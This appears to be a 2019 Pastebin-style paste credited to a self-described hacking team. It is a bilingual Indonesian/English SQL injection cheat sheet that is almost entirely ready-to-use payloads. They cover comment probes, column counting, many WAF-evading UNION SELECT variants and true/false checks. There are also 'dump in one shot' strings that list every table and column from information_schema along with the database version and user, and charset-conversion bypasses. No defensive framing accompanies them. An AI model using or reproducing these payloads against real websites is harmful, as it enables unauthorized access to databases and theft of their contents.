MR-X666X

ALL BYPASS SQLI BY MR-X666X [JHON]

Aug 23rd, 2019
  1. /*==================================================*/
  2. /* ALL BYPASS SQLI BY MR-X666X [JHON]
  3. /* BLACK CODERS ANONYMOUS SATANIC EXPLOITER TEAM
  4. /*==================================================*/
  5.  
  6. ====================================================================
  7. #INDONESIA > PERTAMA KITA CEK COMMENTING NYA ATAU ERROR NYA
  8. #ENGLISH > FIRST WE CHECK THE COMMENTING OR THE ERROR
  9.  
  10. '--
  11. '--+
  12. '+--+
  13. ')--
  14. ')--+
  15. ')+--+
  16. '))--+
  17. ')))--+
  18. '%23
  19. '%60
  20. '%90
  21. '/*
  22. ';%00
  23. "-- -
  24. "--+-
  25. "%23
  26. ")-- -
  27. ")--+-
  28. "))--+-
  29. ";%00
  30. ") ;%00
  31. "));%00
  32. "%60
  33. "%90
  34.  
  35. ====================================================================
  36. #INDONESIA > KEMUDIAN KITA CARI COLUMN NYA
  37. #ENGLISH > THEN WE FIND ITS COLUMNS
  38.  
  39. order+by
  40. group+by
  41. order/**/by
  42. order/**_**/by
  43. /*!42247order*//**//*!42247by*/
  44. %0aorder%0aby%0a
  45.  
  46. ====================================================================
  47. #INDONESIA > KEMUDIAN KITA CARI COLUMN YANG VULN
  48. #ENGLISH > THEN WE LOOK FOR THE VULNERABLE COLUMN
  49.  
  50. union+select
  51. union/**/select
  52. union/**_**/select
  53. /*!42247union*//**//*!42247select*/
  54. %0aunion%0aselect
  55. union+distinct+select
  56. union+distinctROW+select
  57. UNIunionON+SELselectECT
  58. uni<on+sel<ect
  59. uni<>on+sel<>ect
  60. Union+–+Select
  61. union(/*!/**/SeleCT*/+1,2,3)
  62. /**_**/UnIoN(SeLeCt+1,2,3)
  63. union(select+(1),(2),(3))
  64. UnIoN%A0SeLeCt*FrOm( SeLeCt 1)a join
  65. UnIoN%A0SeLeCt+1,2,3,~4,~5
  66. UnIoN%A0SeLeCt+1,2,3,.4,.5
  67. UnIoN%A0SeLeCt+1,2,3,'4','5'
  68. "9e0UnIoN+SeLeCt
  69. UnIoN+SeLeCt%74
  70. The Methods
  71. .
  72. id=1.unioN/**/distinct%20%73eleCt""a
  73. id=1%.0unioN/**/distinct%20%73eleCt+-!~
  74. id=1%""unioN/**/distinct%20%73eleCt@$%
  75. id=1%''unioN/**/distinct%20%73eleCt@%C0%
  76. id=1-.0unioN/**/distinct%20%73eleCt@%C0/
  77. id=1=\NunioN/**/distinct%20%73eleCt@%FF|
  78. id=1<0.unioN/**/distinct%20%73eleCt@=
  79. id=1>0.unioN/**/distinct%20%73eleCt~.
  80. id=1e0unioN/**/distinct%20%73eleCt""$
  81. id=1^0.unioN/**/distinct%20%73eleCt!~
  82. id=1|""unioN/**/distinct%20%73eleCt\N$
  83. id=1|''unioN/**/distinct%20%73eleCt\N%FF
  84. id=1|.0unioN/**/distinct%20%73eleCt!@
  85. id=1|\NunioN/**/distinct%20%73eleCt""/
  86. and @x:=database() UnIoN SeLect 1,@x,3
  87. ’UnI”On’+'SeL”ECT’
  88. union%23AZZATSSINS_AZZATSSINS_AZZATSSINS_AZZATSSINS%0Aselect
  89. union+select*from(select+1)a+join(select'AZZATSSINS')b+join+(select+version())c
  90.  
  91. EXAMPLES ::⏬
  92. id=1.unioN/**/distinct %73eleCt""a1,2,3``from.%20users``limit 0,1-- -
  93. id=1%.0unioN/**/distinct %73eleCt+-!~a1,2,3|''from%20.users-- -
  94. id=1%""unioN/**/distinct %73eleCt@$%a1,2,3|""from users-- -
  95. id=1%''unioN/**/distinct %73eleCt@%C0%a1,2,3^""from users-- -
  96. id=1-.0unioN/**/distinct %73eleCt@%C0/a1,2,3.1from users-- -
  97. id=1=\NunioN/**/distinct %73eleCt@%FF|a1,2,3""from users-- -
  98. id=1<0.unioN/**/distinct %73eleCt@=a1,2,3''from users-- -
  99. id=1>0.unioN/**/distinct %73eleCt~.a1,2,3 from users-- -
  100. id=1e0unioN/**/distinct %73eleCt""$a1,2,3 from users-- -
  101. id=1^0.unioN/**/distinct %73eleCt!~a1,2,3 from users-- -
  102. id=1|""unioN/**/distinct %73eleCt\N$a1,2,3 from users-- -
  103. id=1|''unioN/**/distinct %73eleCt\N%FFa1,2,3 from users-- -
  104. id=1|.0unioN/**/distinct %73eleCt!@a1,2,3 from users-- -
  105. id=1|\NunioN/**/distinct %73eleCt""/a1,2,3 from users-- -
  106.  
  107. ====================================================================
  108. #INDONESIA > CEK FALSE TRUE NYA
  109. #ENGLISH > CHECK THE FALSE/TRUE CONDITION
  110.  
  111. and+0
  112. div+0
  113. and+false
  114. having+0
  115. having+1=0
  116. and+1=0
  117. limit 0
  118. " and '1'='1
  119. " and (1)=(1
  120. where 1 /*!=*/ 2
  121. and 2>3
  122. /*!and/+1=0
  123. and(1)=(0)
  124. /*!aND*/+1+like+0
  125. +and+2>3+
  126. and+(1)!=(0)
  127. and/**/0/**/
  128. and/**_**/0/**_**/
  129. and/**/false/**/
  130. and/**_**/false/**_**/
  131. /*!50000or*/1='1'
  132. /*!or*/1='1
  133.  
  134. ====================================================================
  135. #INDONESIA > SEKARANG KITA DUMP ATAU DIOS
  136. #ENGLISH > NOW WE DUMP OR USE DIOS (DUMP IN ONE SHOT)
  137.  
  138. concat_ws(0x3c62723e,0x424c41434b20434f4445525320414e4f4e594d4f5553,schema(),version(),user(),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x))
  139.  
  140. concat_ws/**/(0x3c62723e,0x424c41434b20434f4445525320414e4f4e594d4f5553,database/**/(),version/**/(),user/**/(),(select%20concat/**/(@AZZATSSINS:=0x00,if((select%20count(*)%20/*!42247from*/%20/*!42247information_schema*/.columns%20/*!42247where*/%20/*!42247table_schema*/%20not%20like%200x696e666f726d6174696f6e5f736368656d61%20and%20@BLACKCODERSANONYMOUS:=concat/**/(@BLACKCODERSANONYMOUS,0x3c62723e,/*!42247table_name*/,0x3a,/*!42247column_name*/)),0x00,0x00),@BLACKCODERSANONYMOUS)))
  141.  
  142. (/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/(@)from(`InFoRMAtiON_sCHeMa`.`ColUMNs`)where(`TAblE_sCHemA`=DatAbAsE/*data*/())and(@)in(@:=CoNCat%0a(@,0x3c62723e5461626c6520466f756e64203a20,TaBLe_nAMe,0x3a3a,column_name))))a)
  143.  
  144. +and@x:=concat+(@:=0,(select+count(*)/*!50000from*/information_schema.columns+where+table_schema=database()+and@:=concat+(@,0x3c6c693e,table_name,0x3a3a,column_name)),@)/*!50000UNION*/SELECT+
  145.  
  146. export_set(5,@:=0,(select+count(*)/*!50000from*/+/*!50000information_schema*/.columns+where@:=export_set(5,export_set(5,@,0x3c6c693e,/*!50000column_name*/,2),0x3a3a,/*!50000table_name*/,2)),@,2)
  147.  
  148. concat%0b(@c:=0x00,if((select%20count(*)%20from%20/*!50000information_schema*/.columns%20/*!50000where*/%20table_schema%20not%20like%200x696e666f726d6174696f6e5f736368656d61%20and%20@c:=concat%0b(@c,0x3c62723e,/*!50000table_name*/,0x2e,/*!50000column_name*/)),0x00,0x00),@c)
  149.  
  150. make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)
  151.  
  152. replace(replace(replace(0x232425,0x23,@:=replace(replace(replace(replace(0x243c62723e253c62723e3c666f6e7420636f6c6f723d233538666166343e263c2f666f6e743e3c62723e3c666f6e7420636f6c6f723d233538666166343e273c2f666f6e743e3c666f6e7420636f6c6f723d3538666166343e,0x24,0x3c62723e3c62723e3c666f6e7420636f6c6f723d233538464146343e424c41434b20434f4445525320414e4f4e594d4f55532057415320494e4a454354454420484552453c2f666f6e743e3c666f6e7420636f6c6f723d233538464146343e),0x25,version()),0x26,database()),0x27,user())),0x24,(select+count(*)+from+information_schema.columns+where+table_schema=database()+and@:=replace(replace(0x003c62723e2a,0x00,@),0x2a,table_name))),0x25,@)
  153.  
  154. (select+(@a)+from+(select(@a:=0x00),(@tbl:=0x00),(@tbl_sc:=0x00),(select+(@a)+from+(information_schema.columns)where+(table_schema!='information_schema')+and(0x00)in(@a:=concat(@a,0x3c62723e,if(+(@tbl!=table_name),+Concat(0x3c62723e,@tbl_sc:=table_schema,'+::',@tbl:=table_name,'+(Rows+',(select+table_rows+from+information_schema.tables+where+table_schema=@tbl_sc+and+table_name=@tbl),')',column_name),+(column_name))))))a)
  155.  
  156. ====================================================================
  157. #INDONESIA AND ENGLISH > BYPASS CONVERT
  158.  
  159. *convert(concat(schema()+using+ascii)
  160. ujis
  161. ucs2
  162. tis620
  163. swe7
  164. sjis
  165. macroman
  166. macce
  167. latin7
  168. latin5
  169. latin2
  170. koi8u
  171. koi8r
  172. keybcs2
  173. hp8
  174. geostd8
  175. gbk
  176. gb2132
  177. armscii8
  178. ascii
  179. binary
  180. cp1250
  181. big5
  182. cp1251
  183. cp1256
  184. cp1257
  185. cp850